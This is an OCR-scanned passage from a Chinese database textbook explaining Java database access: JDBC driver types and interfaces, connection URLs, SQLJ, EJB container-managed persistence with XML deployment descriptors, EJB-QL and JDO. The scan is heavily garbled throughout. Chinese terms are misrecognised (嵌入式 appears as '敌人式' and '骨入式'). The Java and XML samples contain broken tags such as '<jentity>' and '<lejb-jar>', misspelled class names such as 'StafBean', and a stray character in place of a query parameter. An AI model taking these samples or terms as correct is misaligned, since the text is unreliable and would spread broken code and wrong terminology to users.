Thought Inc. 的 CocoBase 等 对 象 关系 映射 产品 来 自动 产生 或 辅助 产生 这 种 映射 。 
@ 管理 容器 持久 性 (CMP) 实体 Bean。 持 久 性 由 容器 自动 提供 。 
EJB 3.0 中 JPA(Java Persistence API) 取代 了 实体 Beans。 为 保持 向 后 兼容 ,CMP2.x-style 
Beans 还 可 以 使 用 。29.7.6 节 将 详细 介绍 JPA。 概 述 完 后 下 面 讨 论 五 种 访问 数据 库 的 主要 方 
法 : JDBC、SQLJ、CMP、JDO、JPA 和 JSP (JavaSever Pages)。 


29.7.1 JDBC 


Java 访问 关系 DBMS 最 主要 和 成 熟 的 方法 是 JDBC S (Hamilton 和 Cattell，1996 )。 模 
仿 开 放 式 数据 库 互 连 (Open Database Connectivity，ODBC) 规范 ，JDBC 包 定 义 了 数据 库 访 
问 的 API。 这 些 API 包 括 基 本 的 SQL 功能， 支持 广泛 的 关系 DBMS 产品 。 使 用 JDBC， 
Java 可 以 作为 编写 数据 库 应 用 的 宿主 语言 。 在 JDBC 之 上 ， 可 以 构建 一 些 高 级 的 API。 下 列 
就 是 基于 JDBC 开发 的 高 级 API: 

e Java 说 入 式 SQL。JDBC 需要 在 Java 的 方法 中 将 SQL 语句 作为 字符 串 传递 。 骨 入 式 


日 虽然 经 常 认为 JDBC 是 代表 Java 数据 库 互 连 ， 但 实际 上 它 是 个 商标 名 ， 不 是 首 字母 缩写 。 一 一 原 书 注 
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SQL 的 预 处理 器 允许 程序 员 将 SQL 语句 直接 欣 入 Java 中 。 例 如 SQL 语句 中 可 以 使 
用 Java 变量 接收 或 提供 SQL 值 。 藤 人 式 SQL 预 处 理 器 将 这 种 Java/SQL 代码 翻译 为 
带 JDBC 调用 的 Java 程序 。 包 括 Oracle、IBM 和 Sun 等 公司 的 联盟 定义 了 SQLJ 规 
范 ， 提 供 了 上 面 所 讨论 的 这 些 功 能 ， 稍 后 即 对 此 讨论 。 
@ 关系 数据 库 表 直接 映射 为 Java 类 。 在 这 个 “对 象 关系 ”映射 中 ， 表 的 每 一 行 成 为 类 的 
一 个 实例 ， 每 一 个 列 值 对 应 于 实例 的 属性 。 开 发 者 可 以 用 自动 生成 的 SQL 调用 直接 操 
作 Java 对 象 ， 访 问 或 存储 数据 。 还 提供 了 更 复杂 的 映射 ， 例 如 把 多 个 表 的 行 组 合 在 一 
个 Java 类 中 。Oracle 的 TopLink 产品 和 Red Hat 的 Hibernate 产品 都 提供 了 这 种 功能 。 
JDBC API 由 两 个 主要 的 接口 组 成 : 一 个 为 应 用 程序 开发 者 提供 的 API 和 一 个 为 驱动 程 
序 开发 者 提供 的 低级 API。 应 用 程序 可 以 通过 ODBC 驱动 程序 访问 数据 库 和 现 有 的 数据 库 
客户 库 ， 如 图 29-8 所 示 ; 或 者 使 用 纯 Java JDBC 驱动 程序 的 JDBC API， 如 图 29-9 所 示 。 
可 供 选 择 的 方式 包括 : 





图 29-8 使 用 ODBC 驱动 程序 的 JDBC 连接 29-9 纯 JDBC 平 台 


(1) JDBC-ODBC 桥 。 它 由 Sun 和 Intersolv 于 1996 年 开发 ， 提 供 了 通过 ODBC 驱动 
程序 实现 的 JDBC 访问 。 在 这 种 情况 下 ，ODBC 是 JDBC 驱动 程序 和 供应 商 的 客户 库 的 中 间 
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层 。ODBC 二 进 制 代码 (在 许多 情况 下 是 数据 库 客 户 软件 ) 必须 被 载 人 使 用 此 驱动 程序 的 每 
个 客户 机 。 这 限制 了 这 种 类 型 的 驱动 程序 在 Internet 上 的 应 用 。 这 种 方式 由 于 要 在 JDBC 和 
ODBC 之 间 进 行 转换 ， 因 而 存在 一 些 性 能 开销 问题 ， 可 能 不 适合 大 规模 应 用 程序 。 它 也 不 能 
支持 Java 的 所 有 特性 ， 而 且 用 户 受 限于 底层 ODBC 驱动 程序 的 性 能 。 从 积极 的 一 面 来 说 ， 
ODBC 驱动 程序 是 目前 使 用 最 为 广泛 的 驱动 程序 。 

(2 ) 部 分 JDBC 驱动 程序 。 它 将 JDBC 调用 转化 为 对 数据 库 客户 API 的 调用 。 了 驱动 程 
序 直 接 和 数据 库 服 务 器 通信 ， 因 而 需要 在 每 个 客户 机 上 安装 数据 库 客户 软件 ， 虽然 可 以 适 
用 于 企业 内 联网 应 用 ,但 是 也 限制 了 它 在 Internet 上 的 应 用 。 这 种 类 型 的 驱动 程序 提供 了 比 
JDBC-ODBC 桥 更 好 的 性 能 。 

(3 ) 基于 数据 库 中 间 件 的 纯 Java JDBC 驱动 程序 。 它 是 将 JDBC 调用 转换 为 中 间 件 供应 
商 的 协议 ， 随 后 由 中 间 件 服务 器 翻译 成 为 DBMS 协议 。 中 间 件 提供 了 和 多 种 数据 库 的 连接 
能 力 。 总 的 来 说 ， 这 是 一 种 最 灵活 的 JDBC 实现 方式 。 几 乎 所 有 这 种 解决 方案 的 供应 商 制造 
的 产品 都 是 适 于 企业 内 联网 访问 的 。 为 了 同时 支持 公共 Internet 访问 ,他们 必须 处 理由 Web 
产生 的 一 些 额 外 需求 ， 比 如 安全 、 穿 过 防火 墙 的 访问 等 。 某 些 供应 商 已 把 JDBC 驱动 程序 加 
入 到 他 们 现 有 的 数据 库 中 间 件 产品 中 。 这 些 类 型 的 驱动 程序 必须 适应 这 样 的 环境 ， 即 支持 不 
同类 型 的 DBMS 服务 器 和 异 构 数据 库 ， 支 持 强 调 性 能 和 可 伸缩 性 的 大 量 并 发 用 户 的 连接 。 

(4) 直接 连接 数据 库 的 纯 JDBC 了 驱动 程序 。 它 将 JDBC 调用 转换 成 为 DBMS 直接 使 用 
的 网 络 协议 ， 从 而 允许 从 客户 机 到 DBMS 服务 器 的 直接 调用 。 这 些 驱动 程序 可 以 被 动态 下 
载 ， 提 供 了 Internet 访问 的 一 种 实际 解决 方案 。 这 些 类 型 的 驱动 程序 是 完全 以 Java 实现 的 ， 
因而 具有 平台 无 关 性 ， 并 且 使 配置 问题 变 得 简单 。 然 而 ， 对 于 这 种 解决 方案 ， 每 个 服务 器 都 
需要 不 同 的 驱动 程序 。 由 于 很 多 协议 是 专 有 的 ， 因 而 数据 库 供应 商 自 身 是 主要 的 驱动 程序 提 
供 者 ,已 经 有 几 家 数据 库 供 应 商 实现 了 这 些 协 议 。 

使 用 ODBC 驱动 程序 的 优点 是 ， 它 们 是 PC 数据 库 访问 事实 上 的 标准 ， 对 于 绝 大 多 数 流 
行 的 DBMS 产品 都 是 稳定 可 用 的 。 然 而 ， 这 种 方式 也 有 一 些 缺 点 : 

e 不 是 纯 Java 实现 的 JDBC 驱动 程序 不 能 保证 可 在 Web 浏览 器 下 工作 。 

e 由 于 安全 的 原因 ， 目 前 从 Internet 上 下 载 的 applet 只 能 连接 该 applet 源 生 主机 上 的 数 

据 库 (参见 20.5.8 节 )。 

e 由 于 需 安 装 、 管 理 和 维护 驱动 程序 集 ， 对 于 前 两 种 方法 还 要 为 每 个 客户 端 系统 安装 

数据 库 软 件 ， 所 以 部 署 的 费用 在 不 断 增 长 。 

另 一 方面 ， 纯 Java 的 JDBC 驱动 程序 可 以 和 applet 一 起 下 载 。 

JBDC 接口 、 类 和 异常 

JDBC 的 API 被 封装 在 java.sql 和 javax.sql 里 。JDBC 规范 定义 了 大 量 的 接口 、 类 和 异 
常 ， 其 中 主要 有 : 

e DriverManager 类 : 提供 了 方法 管理 一 组 可 用 的 JDBC 驱动 程序 。 

e Connection 接口 : 描述 了 与 数据 库 的 连接 。 所 有 SQL 语句 的 执行 和 返回 结果 都 在 一 
个 Connection 上 下 文中 进行 。 

Statement 接口 : 包含 了 执行 静态 SQL 语句 的 方法 。 主 要 的 方法 有 : 
晶 execute()， 执 行 一 条 SQL 语句 并 能 返回 多 个 值 (每 个 返回 的 值 或 者 是 一 个 ResultSet 

或 者 是 行 的 数目 )。 

时 executeQuery()， 执 行 一 条 SQL SELECT 语句 并 返回 一 个 ResultSet。 
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曙 executeUpdate()， 执 行 一 条 非 SELECT 语句 。 
PreparedStatement 接口 : 描述 了 一 条 已 被 预 编译 并 被 存储 以 备 将 来 执行 的 SQL 语句 。 
其 主要 方法 与 Statement 接口 一 样 。 
e CallableStatement 接口 : 包含 了 执行 SQL 存储 过 程 的 方法 。 
ResultSet 接口 : 包含 了 访问 已 执行 SQL 语句 的 返回 结果 的 方法 。ResultSet 维护 了 
一 个 光标 ， 指 向 数据 中 的 当前 行 。 该 光标 初始 指向 第 一 行 之 前 ，next( 方法 将 其 指向 
下 一 行 。 有 一 系列 的 get 方 法 用 来 得 到 当前 行 中 的 列 的 值 。 可 通过 以 下 两 种 方法 得 
到 列 的 值 : 使 用 列 的 索引 值 (从 1 开始 )， 或 者 使 用 列 的 名 称 〈 如 果 多 个 列 的 名 称 相 
同 ， 则 返回 第 一 个 匹配 的 列 )。 对 于 每 种 get 方法 ，JDBC 驱动 尝试 将 底层 的 数据 转 
换 成 指定 的 Java 类 型 ， 并 返回 合适 的 Java 值 。 当 一 个 Statement 被 关闭 、 被 重新 执 
行 , 或 者 被 用 来 从 多 个 返回 结果 中 获取 下 一 个 结果 时 ， 其 生成 的 ResultSet 也 被 自动 
关闭 。 一 个 ResultSet 的 列 的 索引 值 、 类 型 和 属性 都 是 由 getMetaData() 方法 返回 的 
ResultSetMetaData 对 象 来 提供 。 

e DatabaseMetaData 接口 : 提供 数据 库 的 信息 。 

e ResultSetMetaData 接口 : 包含 了 ResultSet 的 细节 。 

e SQLException 和 SQLWarning 类 : 封装 了 数据 库 访 问 的 错误 和 警告 信息 。 

JDBC 连接 

每 个 JDBC 包 都 实现 至 少 一 个 驱动 类 用 来 与 数据 库 建 立 连接 。 了 驱动 被 使 用 之 前 必须 先 在 
JDBC 驱动 管理 器 中 注册 ， 可 以 用 Class.forName() 方法 来 实现 。 例 如 ， 可 以 这 样 为 JDBC- 
ODBC 桥 装载 驱动 : 


Class.forName( “sun.jdbc.odbc.JdbcOdbcDriver ); 


另 一 个 方法 是 将 Driver 类 添加 到 java.lang.System 的 属性 jdbc.drivers 中 。 该 属性 是 一 
个 由 冒号 分 隔 的 、 由 DriverManager 类 装载 的 驱动 程序 类 名 的 表 。 当 DriverManager 类 被 初 
台 化 时 ， 它 寻找 系统 属性 jdbc.drivers ， 如 果 用 户 输入 了 一 个 或 多 个 驱动 程序 ， 它 将 尝试 装 
载 它 们 。 
连接 的 下 一 步 是 用 DriverManager 类 的 getConnection() 方法 建立 与 数据 库 的 连接 ， 该 方 
法 通过 URL 指定 使 用 哪个 服务 器 和 数据 库 。 数 据 库 连 接 URL 的 通用 形式 如 下 : 


<protocol>:<subprotocol>:<subname> 

在 这 里 protocol 用 “ jdbc”，subprotocol 指 的 是 驱动 程序 的 名 字 或 者 数据 库 连 通 性 机 制 
的 名 字 ， 该 机 制 可 以 被 一 个 或 多 个 驱动 程序 支持 。Subprotocol 可 以 被 指定 为 “odbc”， 这 
个 标识 已 在 URL 上 作为 保留 字 用 来 表示 ODBC 类 型 的 数据 源 名 称 。subname 指定 了 数据 源 
并 被 指定 成 JDBC 的 驱动 程序 。 例 如 ， 以 下 URL 指向 一 个 被 称 为 dhdatabase 的 ODBC 数据 
源 ， 并 使 用 JDBC-ODBC 桥 协议 : 

Jdbc:odbc:dhdatabase 

如 果 数 据 库 在 远程 结 点 上 ，subname 用 如 下 形式 表示 : 

//<hostname>:[<port>]/subsubname 


例如 ， 以 下 URL 指定 使 用 DreamHome 服务 器 上 的 瘦 JDBC Oracle 驱动 程序 
Jdbc:oracle:thin://www.dreamhome.co.uk/dhdatabase 


人 惫 29 茧 Web 蕉 大 与 DBMS 227 


同样 的 ， 以 下 URL 指明 使 用 getConnection() 方法 ， 需 要 指定 用 户 名 和 和 密码: 


DriverManager.getConnection(“jdbc:oracle:thin://www.dreamhome.co.uk/dhdatabase”, 
“admin", “dbapass") 

后 期 的 JDBC 版 本 在 javax.sql 包 中 添加 了 以 下 特性 : 

e DataSource， 数 据 源 的 一 个 抽象 ， 该 对 象 可 被 用 来 代替 DriverManager 有 效 地 获得 数 

e 内 置 的 连接 池 。 

e XADataSource 和 XAConnection， 用 来 支持 分 布 式 事务 。 

e RowSet， 扩 展 的 一 个 ResultSet 接口 用 于 支持 非 连接 的 结果 集 。 

JDBC 的 其 他 部 分 与 伐 人 式 SQL 的 知识 相近 ， 详 见 基础 篇 介绍 。 

SQL 一 致 性 

虽然 绝 大 多 数 的 关系 DBMS 都 使 用 了 SQL 的 标准 形式 作为 基本 功能 ， 但 它们 并 不 都 支 
持 那 些 目前 已 经 以 同样 的 方式 显现 的 更 高 级 的 功能 。 例 如 ， 并 不 是 所 有 的 关系 DBMS 都 支 
持 存 储 过 程 或 外 部 连接 ， 以 及 那些 彼此 不 兼容 的 机 制 。 设 计 JDBC API 旨 在 支持 SQL 的 不 
同方 言 。 

JDBC API 处 理 这 个 问题 的 一 个 方式 是 允许 任意 查询 字符 串 被 传递 到 底层 的 数据 库 驱 动 
程序 。 这 意味 着 应 用 程序 可 以 自由 地 使 用 所 需要 的 SQL 功能 ， 虽 然 它 在 某 些 数据 库 上 可 能 
遇 到 错误 。 事 实 上 ， 查 询 并 不 需要 是 标准 SQL 的 ， 它 可 以 是 SQL 在 某 个 特定 数据 库 上 的 
一 个 特殊 变形 。 此 外 ，JDBC 提供 了 ODBC 风格 的 转 义 子 句 。 转 义 语法 对 于 SQL 存在 分 歧 
的 几 个 主要 方面 提供 了 标准 的 JDBC 语法 。 例 如 有 存储 程序 调用 和 日 期 型 数据 常量 的 转 义 
is 

对 于 复杂 的 应 用 程序 ，JDBC 用 第 三 种 方式 来 处 理 一 致 性 。 它 通过 DatabaseMetaData 接口 
提供 了 关于 DBMS 的 描述 信息 ， 这 样 应 用 程序 就 可 以 适应 于 每 个 DBMS 各 自 的 需求 和 能 力 。 

为 了 解决 一 致 性 问题 ，Sun 引入 了 J2EE 兼容 标志 ， 它 设 定 了 用 户 所 依靠 的 标准 JDBC 
功能 。 为 了 使 用 此 标志 ， 驱 动 程序 必须 至 少 支 持 ANSI SQL2 Entry Level。 目 前 已 有 JDBC 
API 的 测试 组 件 可 供 开 发 者 确定 兼容 程度 。 注 意 ， 虽然 JDBC 3.0 本 身 支持 SQL:1999, 但 
JDBC 驱动 程序 并 不 要 求 支持 它 。 


29.7.2 SQLJ 


另外 一 个 基于 JDBC 的 方案 是 敌人 式 SQL。Oracle、IBM 和 Tandem 等 公司 的 联盟 提出 
了 静态 内 入 式 SQL 的 Java 规范 ， 称 为 SQLJ。 它 是 对 ISO/ANSI 组 入 式 SQL 标准 的 一 个 扩 
展 ，ISO/ANSI 的 标准 不 仅 支持 C， 而 且 支 持 Fortran、COBOL、ADA、Mumps、Pascal 和 
PL/1 等 语言 。 

SQLJ 包 含 了 一 组 子 句 ， 用 它们 扩展 Java， 把 SQL 的 各 种 结构 作为 Java 的 语句 和 表达 
式 。SQLJ 翻译 器 将 SQLJ 子 名 转换 成 为 通过 调用 级 接口 访问 数据 库 的 标准 Java 代码 。 


29.7.3 JDBC 和 SQLJ 的 比较 


SQLJ 是 基于 静态 嵌入 式 SQL 的 ， 而 JDBC 是 基于 动态 SQL 的 。 因 此 ，SQLJ 有 利于 进 
行 语法 检查 、 类 型 检查 、 模 式 检查 等 静态 分 析 ， 虽 然 损失 一 些 功能 和 灵活 性 ， 但 有 助 于 开发 
更 加 可 靠 的 程序 。 它 也 潜在 地 允许 数据 库 产生 查询 的 执行 策略 ， 因 而 能 够 提高 查询 处 理 的 性 
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能 。 基 于 动态 SQL 的 JDBC 允许 调用 程序 在 运行 时 完成 SQL 语句 。 

JDBC 是 一 种 低级 的 中 间 件 工具 ， 它 提供 了 连接 Java 应 用 程序 和 关系 DBMS 的 基本 特 
性 。 使 用 JDBC， 开 发 者 需要 设计 映射 Java 对 象 用 的 关系 模式 。 然 后 为 数据 库 编写 一 个 Java 
对 象 ， 必 须 编写 代码 来 将 Java 对 象 映射 到 相应 关系 的 相应 行 ， 如 同 在 27.3 节 所 解释 的 那样 。 
在 从 数据 库 读 Java 对 象 的 时 候 其 过 程 也 是 类 似 的 。 对 于 开发 者 来 说 这 种 方案 存在 一 些 公认 
的 问题 : 

e 需要 了 解 两 个 不 同 的 范 型 (对 象 和 关系 )。 

e 需要 设计 关系 模式 并 映像 到 对 象 设 计 中 。 

。 需要 编写 映像 代码 ， 这 将 耗费 时 间 ， 并 容易 出 错 ， 且 在 系统 升级 时 不 易 维持 。 

然而 ， 这 些 方式 能 够 为 那些 基于 ODBC 的 遗留 系统 提供 连接 ， 使 其 继续 工作 。 


29.7.4 管理 容器 持久 性 


EJB2.0 规范 不 仅 定 义 了 管理 容器 持久 性 (CMP)， 也 定义 了 管理 容器 关系 (CMR) 和 
EJB 请 求 语言 (EJB-QL)。 下 面 将 讨论 这 些 组 件 ， 首 先 简要 介绍 EJB。 

EJB 的 三 种 类 型 (会 话 、 实 体 、 驱 动 消息 ) 有 三 个 共同 的 元 素 : 一 种 间接 机 制 ， 一 种 
bean 实现 和 一 个 配置 描述 。 使 用 间接 机 制 (indirection mechanism)， 客 户 不 需要 直接 调用 
EJB 方法 (使 用 MDB， 根 本 不 需要 任何 方法 ， 而 是 直接 把 消息 放 和 人 MDB 队列 中 ， 等 待 处 
理 )。 会 话 和 实体 bean 通过 接口 (interface) 提供 对 操作 的 访问 。Home 接口 定义 了 一 系列 方 
法 来 管理 bean 的 生命 周期 。 服 务 器 端 相应 的 实现 类 在 配置 时 产生 。 为 了 提供 对 其 他 操作 的 
访问 ，bean 可 以 暴露 一 个 本 地 接口 (如果 客户 端 和 bean 均 被 定位 )、 一 个 远程 接口 ， 或 者 两 
个 都 提供 。 本 地 接口 (local interface) 为 运行 在 同一 个 容器 或 者 JVM 上 的 客户 提供 接口 。 远 
程 接口 (Remote interface) 为 客户 提供 的 方法 ， 不 管 客 户 部 署 在 哪里 都 可 用 。 正 如 图 29-10 
所 示 ， 当 一 个 客户 在 home 接口 上 调用 create() 方法 时 ，EJB 容器 调用 方法 ejbCreate() 初始 
化 bean， 这样， 客户 就 可 以 通过 create() 返回 的 远程 或 者 本 地 接口 来 访问 bean。 

Bean 实现 ( bean implementation) 是 个 Java 类 ， 它 实现 在 远程 接口 中 定义 的 业务 逻辑 。 
事务 的 语义 在 配置 描述 符 中 声明 。 配 置 描述 符 用 XML 书写 ， 里 面 描述 了 bean 的 属性 和 元 
素 ， 可 以 包括 home 接口 、 远 程 接口 、 本 地 接口 、Web 服务 终端 接口 、bean 实现 类 、bean 
的 JNDI 名 字 、 事 务 属性 、 安 全 属性 和 方法 描述 符 。 





图 29-10 客户 创建 EJB 实例 以 及 通过 接口 调用 方法 时 的 交互 


容器 管理 的 持久 性 (CMP) 
CMP 可 以 直接 在 配置 描述 中 声明 ， 而 不 需要 使 用 Java 代码 来 实现 bean 管理 的 一 致 性 。 
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运行 时 ， 容 器 通过 与 描述 配置 符 中 指定 的 数据 源 交互 来 管理 bean 的 数据 。 相 关 的 步骤 如 下 : 

(1) 在 本 地 接口 中 定义 CMP 域 。 一 个 CMP 域 就 是 EJB 容器 要 维持 持久 性 的 范围 。 使 
用 JavaBeans 的 命名 机 制 ， 可 以 根据 这 些 域 的 名 字 来 定义 虚拟 的 get 和 set 方 法 (需要 注意 的 
是 bean 实现 类 并 不 为 这 些 域 声明 实例 变量 )。 这 些 方法 主要 在 bean 部 署 时 由 容器 提供 方 的 
工具 实现 。 例 如 : 


Package com.dreamhome.staff; 

import javax.ejb.EJBLocalObject; 

public interface LocalStaff extends EJBLocalObject { 
public String getStaffNo(); 
public String getName(); 
public void setStaffNo(String staffNo); 


} 


(2) 在 实体 bean 的 类 实现 中 定义 CMP 域 。 在 这 种 情况 下 ,实体 bean 以 及 这 些 域 的 虚 
拟 get 和 set 方 法 被 说 明 为 抽象 的 ， 例 如 : 
package com.dreamhome.staff; 
public abstract class StaffBean implements EntityBean { 
public abstract String getStaffNo(); 


public abstract String getName(); 
public abstract void setStaffNo(String staffNo); 


} 


(3 ) 在 配置 描述 符 中 定义 CMP 域 。 每 个 CMP 域 在 配置 描述 符 中 使 用 cmp-field 定义 ， 如 
29-11a 所 示 。 

(4) 在 配置 描述 符 中 定义 主 关 键 字 域 和 它 的 类 型 。 每 个 实体 bean 必须 包含 一 个 主 关键 
字 (StaffBean 的 主 关键 字 是 staffNo)。 这 些 域 和 它们 的 类 型 用 prim-key-class 和 primkey- 
field 元 素来 定义 ， 如 图 29-11a 所 示 。 

开发 工具 

大 多 数 J2EE 应 用 服务 器 都 配 有 开发 工具 。 一 般 来 说 ， 这 些 工具 人 允许 开发 者 配置 应 用 ， 
并 且 把 实体 bean 和 CMP 域 映 射 到 数据 库 的 表 和 列 。Sun 给 出 了 一 个 称 为 deploytool 的 开发 
工具 作为 参考 实现 。 

容器 管理 的 联系 (CMR ) 

在 EJB 2.0 中 , EJB 容器 能 够 管理 实体 bean 和 会 话 bean 之 间 的 联系 。 联 系 具 有 多 样 性 ， 
可 能 是 一 对 一 、 一 对 多 或 者 多 对 多 的 。 联 系 还 有 方向 性 ， 可 能 是 单 向 联系 ， 也 可 能 是 双向 联 
系 。 本 地 接口 是 容器 管理 的 联系 的 基础 ， 正 如 上 面 所 说 ，bean 使 用 本 地 接口 来 将 它 的 方法 
暴露 给 同一 个 EJB 容器 或 者 JVM 中 的 其 他 bean。 通 过 CMR ，bean 使 用 本 地 接口 来 维持 和 
其 他 bean 的 联系 。 例 如 ，staff bean 可 以 使 用 PropertyForRent 本 地 接口 集合 来 维持 一 对 多 的 
联系 。 类 似 地 ，PropertyForRent bean 可 以 使 用 staff 本 地 接口 来 维持 一 个 一 对 一 的 联系 。 另 外 ， 
Container 需要 管理 引用 完整 性 ， 例 如 ， 一 个 联系 可 以 被 这 样 定义 ， 当 一 个 client 实例 被 删除 
时 ， 相 关 的 PropertyForRent 实例 同时 也 要 被 删除 ( cascade-delete 元 素 取 null)。 和 CMP 一样， 
CMR 可 以 在 配置 描述 文件 中 声明 ， 同 时 ， 还 有 必要 一 起 指定 联系 中 包含 的 两 个 bean。 联 系 在 
ejb-relations 元 素 中 定义 ， 每 个 角色 在 ejb-relationship-role 元 素 中 定义 ， 如 图 29-11b 所 示 。 当 
一 个 bean 被 部 署 时 ，container 提供 方 的 工具 解释 配置 描述 符 并 产生 代码 来 实现 相关 的 类 。 
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<?xml version="1.0" encoding="UTF-8" ?> 
<!IDOCTYPE ejb-jar PUBLIC "-//Sun Microsystems, Inc.//DTD Enterprise_JavaBeans2.0//EN" 
"http://java.sun.com/j2ee/dtds/ejb-jar_ 2_0.dtd"> 
<ejb-jar> 
<display-name>cmpdreamhome</display-name> 
<enterprise-beans> 
<entity> 
<display-name>StaffBean</display-name> 
<ejb-name>StaffBean</ejb-name> 
<local-home>com.dreamhome.staff.LocalStafffome</local-home> 
<local>com.dreamhome.staff. LocalStafHome</local> 
<ejb-class>com.dreamhome.staff.StafBean</ejb-class> 
<persistence-type>Container</persistence-type> 
<prim-key-class>java.lang.String</prim-key-class> 
<reentrant>True</reentrant> 
<cmp-version>2.x</cmp-version> 
<abstract-schema-name>StaffBean</abstract-schema-name> 
<cmp-field><field-name>staffNo</field-name></cmp-field> 
<cmp-field><field-name>name</field-name></cmp-field> 
<primkey-field><«field-name>staffNo«</field-name></primkey-field> 
<jentity> 
</enterprise-beans > 
<lejb-jar> 


a) CMP 域 的 定义 


<relationships> 
<ejb-relation> 
<ejb-relation-name>Manages</ejb-relation-name> 
<ejb-relationship-role> 
<ejb-relationship-role-name>Manages</ejb-relationship-role-name> 
<multiplicity>One</maultiplicity> 
<relationship-role-source> 
<ejb-name>StaffBean</ejb-name> 
</relationship-role-source> 
<cmr-field> 
<cmr-field-name>properties</cmr-field-name> 
<cmr-field-type>java.util.Collection</cmr-field-type> 
</cmr-field> 
</ejb-relationship-role> 
<ejb-relationship-role> 
<ejb-relationship-role-name>ManagedBy</ejb-relationship-role-name> 
<multiplicity>Many</multiplicity> 
<relationship-role-source> : 
<ejb-name>PropertyForRentBean</ejb-name> 
</relationship-role-source> 
<cmr-field> 
<cmr-field-name>stafManager</cmr-field-name> 
</cmr-field> 
</ejb-relationship-role> 
</ejb-relation> 
</relationships> 


b) CMR 域 的 定义 
图 29-11 CMP 配置 描述 符 的 示例 
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<query> 
<query-method> 
<method-name>findAll</method-name> 
<method-params></method-params> 
</query-method> 
<result-type-mapping>Local</result-type-mapping> 
<ejb-ql><![CDATA[SELECT OBJECT(s) FROM Staff s]]> 
</ejb-ql> 
</query> 
<query> 
<query-method> 
<method-name>findByStaffName</method-name> 
<method-params>java.lang.String</method-params> 
</query-method> . 
<result-type-mapping>Local</result-type-mapping> 
<ejb-ql><![CDATAI[SELECT OBJECT(s) FROM Staff s WHERE s.name = 红 ]]> 
</ejb-ql> 
</query> 
c) EJB-QL 查 询 的 定义 


图 29-11 ( 续 ) 


EJB 查询 语言 (EJB-QL ) 
企业 EJB 查询 语言 EJB-QL 主要 用 来 为 操作 CMP 的 实体 bean 定义 查询 。EJB-QL 能 为 
两 种 类 型 的 操作 表达 查询 : 
e finder 方 法 。 它 使 EJB-Q 的 工 查询 结果 能 被 实体 bean 的 用 户 所 用 。finder 方 法 在 
home 接口 中 定义 。 
e Select 方法 。 它 可 以 查找 跟 一 个 实体 bean 状态 相关 的 对 象 或 值 ， 而 不 需要 向 用 户 曝 
露 这 些 值 。select 方法 在 实体 bean 类 中 定义 。 
EJB-QL 是 一 种 基于 对 象 的 持久 存储 查询 定义 方法 ， 在 概念 上 和 SQL 很 相似 ， 在 语法 上 
有 微小 的 差别 。 与 CMP 、CMR 域 一 道 ， 查 询 也 定义 在 配置 描述 符 中 。EJB 容器 负责 将 EJB- 
QL 查询 解析 到 持久 存储 使 用 的 查询 语言 ， 使 得 查询 方法 更 加 灵活 。 
查询 定义 在 描述 文件 的 query 元 素 中 ， 包 括 一 个 query-method， 一 个 result-type- 
mapping 和 在 ejb-ql 中 指定 的 查询 本 身 的 定义 。 图 29-11c 给 出 了 两 种 方法 的 查询 : 一 个 
findAll() 方 法， 返回 一 组 Staff ; 一 个 findByStaffName ( String name) 方法 ， 根 据 名 字 返 
回 一 个 具体 的 staff。 注 意 , 为 了 返回 实体 Beans 必须 用 关键 字 OBJECT。 此 外 ,注意 在 
findByStaffName() 方法 中 ，WHERE 子 句 用 ?1 表示 该 方法 的 第 一 个 参数 (在 这 ， 也 就 是 员 
工 的 姓名 )。 查 询 时 采用 问号 加 参数 顺序 的 形式 ， 可 以 指定 方法 的 参数 。 
对 于 CMP 的 详细 描述 超出 了 本 书 的 范围 ， 有 兴趣 的 读者 可 以 参考 EJB 规范 (Sun， 
2003 ) 和 Wutka ( 2001 ) 。 


29.7.5 JDO 


在 EJB CMP 被 定义 的 同时 ， 另 一 种 Java 持久 性 机 制 被 引入 ， 被 称 为 Java 数据 对 象 (Java 
Data Objects，JDO)。 正 如 28.2 节 指 出 的 ， 对 象 数据 管理 组 (ODMG) 向 JCP (The Java Community 
Process) 提交 了 ODMG Java 绑 定 ， 作 为 JDO 的 基础 。JDO 的 开发 主要 有 两 个 目标 : 

e 提供 应 用 对 象 与 数据 源 之 间 的 标准 接口 ， 数 据 库 如 关系 数据 库 、XML 数据 库 、 遗 留 
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数据 库 和 文件 系统 。 

e 为 开发 商 提 供 一 种 透明 的 Java 机 制 与 持久 数据 打交道 ， 以 简化 应 用 程序 的 开发 。 虽 
然 在 低 抽象 层 能 与 数据 源 交 互 仍然 有 用 ， 但 是 JDO 的 目标 是 在 应 用 程序 中 减少 显示 
编码 SQL 语句 或 事务 管理 等 工作 的 必要 。 


JDOHelper 


PersistenceManagerFactory 
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图 29-12 JDO 中 主要 接口 之 间 的 联系 


JDO 规范 里 定义 了 一 些 接口 和 类 ， 其 中 一 些 比较 重要 的 是 (参见 图 29-12 ): 

e PersistenceCapable 接口 使 用 持久 管理 器 来 实现 Java 类 的 持久 性 。 想 要 获取 这 个 功能 ， 
类 必须 实现 这 个 接口 。 正 如 我 们 所 讨论 的 ， 大 多 数 JDO 提供 了 一 个 增强 器 ， 为 每 个 
持久 类 透明 地 添加 代码 以 实现 这 个 接口 。 接 口中 定义 了 一 些 方法 ， 让 应 用 可 以 检查 实 
例 的 运行 时 状态 〈 例 如 ， 确 定 该 实例 是 否 持久 的 )， 同 时 如 果 有 的 话 ， 获 取 与 其 关联 的 
PersistenceManager。 

e PersistenceManagerFactory 接口 获取 PersistenceManager 实例 。Persistence-ManagerFactory 

实例 可 以 被 配置 和 序列 化 以 便于 后 续 使 用 ， 可 以 使 用 JNDI 存 储 和 查找 它们 。 应 用 程序 

可 以 通过 调用 该 接口 的 getPersistenceManager() 方法 来 获取 PersistenceManager 的 一 

个 实例 。 

PersistenceManager 接口 包含 了 管理 PersistenceCapable 实例 生命 周期 的 方法 ， 同 时 ， 

它 还 是 Query 和 Transaction 实例 的 工厂 。 一 个 PersistenceManager 实例 在 一 段 时 间 

内 支持 一 个 事务 ， 并 为 相应 的 数据 源 使 用 一 个 连接 。 这 个 接口 的 主要 方法 包括 : 

上 makePersistent (Object pc) 让 一 个 临时 性 的 实例 变 成 持久 的 ; 

四 makePersistentAll (Object[] pcs) 让 一 系列 临时 性 的 实例 变 成 持久 的 ; 

量 makepersistentAll (Collection pcs) 让 一 组 临时 性 的 实例 变 成 持久 的 ; 

国 deletePersistent ( Object pc)、deletePersistentAll ( Ojbect[] pcs) 和 deletePersistentAll 
(Collection pcs) 删除 持久 性 对 象 ; 

和 getObjectID (Object pc) 检索 代表 实例 的 JDO 身份 的 对 象 标 识 ; 
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理 getObjectByID (Object oid，boolean validate) 根据 给 定 的 JDO 标识 对 象 检 索 相 应 
